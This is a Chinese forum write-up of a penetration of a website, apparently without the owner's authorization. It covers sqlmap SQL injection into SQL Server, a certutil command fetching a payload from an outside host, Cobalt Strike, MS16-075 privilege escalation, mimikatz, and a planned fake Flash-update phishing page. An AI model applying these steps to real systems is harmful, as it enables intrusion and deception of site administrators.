记一次渗透行动
2021-02-18 19:00:59 Author: mp.weixin.qq.com(查看原文) 阅读量:214 收藏

本文为看雪论坛优秀文章

看雪论坛作者ID:毅种循环

朋友们好啊,我是乱日一通————毅种循环。

几天前做的一个目标,现在已经没有价值了,把其中的过程做个记录。
朋友其实发了好几天给我了,因为忙着打2077,只能回复说
眼看着编不下去了,决定抽一天特地来看这个站。

信息收集

信息收集就那么一回事,看子域,看资产,推荐使用FOFA进行收集(好心人们谁给我嫖一个高级会员?)中途的艰辛就不说了,略。因为现在打点进去的服务都给整关了,现在截图截不到了。

打 点


我说我们这个信息收集,这只是渗透的基础,信息收集是讲方法的,谷歌百度git开源情报收集缺一不可。渗透的流程,我们都是要从最基础开始讲起,到全流程都学习…哈!
 
诶…我一说完他啪就演示起来了,很快啊!
 
然后上来就是一个登录框,吭,一边截包一边分析,感觉有SQL注入了,我全防出去了!

进入的点就是子域上的一个登录点,整了个很丑的框(目测感觉有,希望大火不要和我学习养成目测漏洞的习惯),拿sqlmap跑了一下。
大概就是这样子的,运气还不错,用的sqlserver,而且是DBA权限。
[19:24:36] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2014[19:24:36] [INFO] testing if current user is DBAcurrent user is DBA: True
DBA了就不用讲武德了,能执行os-shell就最好,在我开启os-shell之后,准备直接上个CS的马,结果意外发生了,应该是杀毒把powershell拦截了。
好,可以。

然后我就用了一种比较麻烦的方法,先把免杀马传上去再执行,用的是certutil方法。

certutil.exe -urlcache -split -f http://1.1.1.1/1.exe  C:\Users\Public\1.exe

然后:
command standard output:---****  联机  ****  000000  ...  047a7dCertUtil: -URLCache 失败: 0x80070005 (WIN32: 5)CertUtil: 拒绝访问。
好好好,你说什么就是什么。换个目录执行,换成了C/windwos/temp。
command standard output:---****  联机  ****  000000  ...  047a7dCertUtil: -URLCache 命令成功完成。---
然后就上线了我的CS。

后渗透

已知目标2008:

阿里云的服务器,安装67个补丁


修补程序: 安装了 67 个修补程序。

[01]: KB981391[02]: KB981392[03]: KB977236[04]: KB981111[05]: KB977238[06]: KB2849697[07]: KB2849696[08]: KB2841134[09]: KB2841134[10]: KB977239[11]: KB2670838[12]: KB2830477[13]: KB2592687[14]: KB3191566[15]: KB981390[16]: KB2386667[17]: KB2545698[18]: KB2547666[19]: KB2574819[20]: KB2603229[21]: KB2639308[22]: KB2667402[23]: KB2685811[24]: KB2685813[25]: KB2698365[26]: KB2729094[27]: KB2732059[28]: KB2750841[29]: KB2761217[30]: KB2809215[31]: KB2834140[32]: KB2862330[33]: KB2894844[34]: KB2900986[35]: KB2919469[36]: KB2923545[37]: KB2970228[38]: KB2984972[39]: KB3004375[40]: KB3006137[41]: KB3020369[42]: KB3020388[43]: KB3046269[44]: KB3054205[45]: KB3059317[46]: KB3068708[47]: KB3075226[48]: KB3080149[49]: KB3102429[50]: KB3118401[51]: KB3125574[52]: KB3138612[53]: KB3140245[54]: KB3156016[55]: KB3156019[56]: KB3159398[57]: KB3161949[58]: KB3161958[59]: KB3172605[60]: KB3177467[61]: KB3179573[62]: KB3181988[63]: KB3210131[64]: KB4019990[65]: KB4040980[66]: KB976902[67]: KB4038777

用烂土豆 MS16-075提权就行了,一把梭感觉美滋滋。

还是个8G内存的服务器,不存在域环境。

看一下用户,好决定后面怎么行动。



存在三个用户,其中一个IIS Administrator guest。mimikatz没抓到管理员明文,密文也解不开。
看了一下亲爱的管理员登录时间,登录日志全是匿名登录,这直接艾斯比....

不行我得走,万一反过来把我日了。
 
看一下文件进程:

 
整的挺好,还有个迅雷。查看了一下文件的打开路径,结果没有。

 
然后呢,本来想钓管理员PC的,费劲心思在改了他后台页面的源码做了弹窗提示flash版本过低,我甚至连免杀马都准备好了,为了逼真还弄了个假签名。


 
然后嘛,记不清自己干了什么跌卵操作一时心急应该是触发了阿里云的异常报警,判断管理员把web服务给关了,自启服务也没做,权限就这样丢了,只能期待管理员会点击我的文件了。

自然是传统功夫以点到为止,因为这时间,按传统功夫的点到为止同学们已经心服口服了。如果这这一套打完,那自然是很无敌啊。
 
 

反 思

我应该早点固定权限的,阿里云异常登录就报警 连3389我都没进就给整没了。

再怎么整个注册表添加启动项啊。
 
我劝!你们这些年轻人耗子尾汁,好好学习,以后不要再犯我这样的聪明,小聪明,啊,学习要讲沉心静气,要讲态度,不要搞骚操作。
 
啊,谢谢同学们!

- End -

看雪ID:毅种循环

https://bbs.pediy.com/user-home-731531.htm

  *本文由看雪论坛 毅种循环 原创,转载请注明来自看雪社区。

# 往期推荐

公众号ID:ikanxue
官方微博:看雪安全
商务合作:[email protected]

球分享

球点赞

球在看

点击“阅读原文”,了解更多!


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458381134&idx=1&sn=2f13528beb7c2ea01b91d15b695bd109&chksm=b180dbc486f752d2b6e0cff2d5d080f4496f7cea9af5a70244e572122729e1bcb6f9edb6fe8a#rd
如有侵权请联系:admin#unsafe.sh